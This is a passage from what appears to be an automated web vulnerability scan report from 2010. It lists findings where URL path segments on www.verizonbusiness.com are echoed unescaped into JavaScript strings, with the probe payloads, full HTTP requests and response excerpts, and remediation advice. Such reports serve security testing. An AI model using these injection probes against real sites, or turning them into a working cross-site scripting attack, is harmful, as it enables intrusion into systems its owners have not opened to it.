hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/aboutecd29";b46d3377feb/company/executives/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEM
...[SNIP]...

1.326. http://www.verizonbusiness.com/about/company/executives/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/company/executives/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d9599'%3bd6062a784b3 was submitted in the REST URL parameter 1. This input was echoed as d9599';d6062a784b3 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /aboutd9599'%3bd6062a784b3/company/executives/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:52:59 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Content-Type: text/html
Content-Length: 40648
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:52:59 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:52:59 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css" type="text/css"><link med
...[SNIP]...
<script type="text/javascript">
var request='/aboutd9599';d6062a784b3/company/executives/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.327. http://www.verizonbusiness.com/about/company/executives/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/company/executives/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d2444"%3bde883586035 was submitted in the REST URL parameter 2. This input was echoed as d2444";de883586035 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about/companyd2444"%3bde883586035/executives/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:53:06 GMT
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 47109
Date: Wed, 17 Nov 2010 00:53:06 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:53:06 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/about/companyd2444";de883586035/executives/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR
...[SNIP]...

1.328. http://www.verizonbusiness.com/about/company/executives/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/company/executives/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f1985'%3b9312e0d3d10 was submitted in the REST URL parameter 2. This input was echoed as f1985';9312e0d3d10 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about/companyf1985'%3b9312e0d3d10/executives/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:53:14 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html; charset=UTF-8
Content-Length: 47109
Date: Wed, 17 Nov 2010 00:53:14 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:53:14 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/about/companyf1985';9312e0d3d10/executives/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.329. http://www.verizonbusiness.com/about/company/executives/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/company/executives/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ff6b5'%3be83a61c1377 was submitted in the REST URL parameter 3. This input was echoed as ff6b5';e83a61c1377 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about/company/executivesff6b5'%3be83a61c1377/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:53:48 GMT
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 46856
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:53:48 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:53:48 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/about/company/executivesff6b5';e83a61c1377/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.330. http://www.verizonbusiness.com/about/company/executives/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/company/executives/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2049e"%3b55b4960a097 was submitted in the REST URL parameter 3. This input was echoed as 2049e";55b4960a097 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about/company/executives2049e"%3b55b4960a097/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:53:35 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 46854
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:53:35 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:53:35 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet"><link med
...[SNIP]...
e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/about/company/executives2049e";55b4960a097/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.331. http://www.verizonbusiness.com/about/environment/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/environment/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 46859'%3b5c3715eb664 was submitted in the REST URL parameter 1. This input was echoed as 46859';5c3715eb664 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about46859'%3b5c3715eb664/environment/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:53:32 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40634
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:53:32 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:53:32 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/about46859';5c3715eb664/environment/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.332. http://www.verizonbusiness.com/about/environment/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/environment/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 36986"%3b97e2b653e25 was submitted in the REST URL parameter 1. This input was echoed as 36986";97e2b653e25 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about36986"%3b97e2b653e25/environment/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:53:13 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40634
Date: Wed, 17 Nov 2010 00:53:13 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:53:13 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/about36986";97e2b653e25/environment/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR
...[SNIP]...

1.333. http://www.verizonbusiness.com/about/environment/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/environment/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 24f28'%3b7546863c3d was submitted in the REST URL parameter 2. This input was echoed as 24f28';7546863c3d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about/environment24f28'%3b7546863c3d/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:54:20 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 47093
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:54:20 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:54:20 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/about/environment24f28';7546863c3d/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.334. http://www.verizonbusiness.com/about/environment/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/environment/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f99a6"%3bae96979876c was submitted in the REST URL parameter 2. This input was echoed as f99a6";ae96979876c in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about/environmentf99a6"%3bae96979876c/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:53:50 GMT
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 47095
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:53:50 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:53:50 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/about/environmentf99a6";ae96979876c/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.335. http://www.verizonbusiness.com/about/events/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/events/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a7ac7'%3bcea4aeeff4f was submitted in the REST URL parameter 1. This input was echoed as a7ac7';cea4aeeff4f in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /abouta7ac7'%3bcea4aeeff4f/events/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:53:43 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40626
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:53:43 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:53:43 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/abouta7ac7';cea4aeeff4f/events/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.336. http://www.verizonbusiness.com/about/events/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/events/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 95af7"%3be7f92cd1962 was submitted in the REST URL parameter 1. This input was echoed as 95af7";e7f92cd1962 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about95af7"%3be7f92cd1962/events/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:53:32 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40624
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:53:32 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:53:32 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/about95af7";e7f92cd1962/events/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBM
...[SNIP]...

1.337. http://www.verizonbusiness.com/about/events/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/events/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7f93c"%3b9bd47f3437f was submitted in the REST URL parameter 2. This input was echoed as 7f93c";9bd47f3437f in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about/events7f93c"%3b9bd47f3437f/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:53:58 GMT
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 47087
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:53:58 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:53:58 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/about/events7f93c";9bd47f3437f/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.338. http://www.verizonbusiness.com/about/events/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/events/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 59c62'%3b07c70cfa1b8 was submitted in the REST URL parameter 2. This input was echoed as 59c62';07c70cfa1b8 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about/events59c62'%3b07c70cfa1b8/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:54:03 GMT
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 47085
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:54:04 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:54:03 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/about/events59c62';07c70cfa1b8/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.339. http://www.verizonbusiness.com/about/ipinnovation/ [REST URL parameter 1]

Summary

Severity:   High
